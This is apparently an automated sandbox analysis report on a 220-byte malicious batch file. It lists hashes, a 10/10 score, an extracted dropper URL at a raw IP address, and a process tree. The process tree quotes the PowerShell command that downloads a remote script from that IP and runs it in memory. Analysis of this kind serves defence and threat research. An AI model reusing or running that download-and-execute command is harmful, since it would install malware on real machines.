Analysis
-
max time kernel
138s -
max time network
79s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
421a8c43602d912fb7d54f525915eee9.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
421a8c43602d912fb7d54f525915eee9.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
421a8c43602d912fb7d54f525915eee9.bat
-
Size
220B
-
MD5
c786b66ecefc50b20289a9d38575b5a2
-
SHA1
a1851402b42988ea349215149d3ca3b2890eb425
-
SHA256
bf0760cd225ed3fc4df18cf25a62e6f2f45c50f3e4726d258981e81b68e2bd65
-
SHA512
3dc1d42fda27a8b7c9e3c2b32c957f19a619d035ed0609fea3181efac5c037e516b4184659e69fc0821db6fb56f68052f7a23248c05ddac25964357dd6193a77
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 864 504 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 864 WerFault.exe Token: SeBackupPrivilege 864 WerFault.exe Token: SeDebugPrivilege 864 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe 864 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\421a8c43602d912fb7d54f525915eee9.bat"1⤵PID:3656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9');Invoke-GIEGCPPTNOCAU;Start-Sleep -s 10000"2⤵PID:504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:864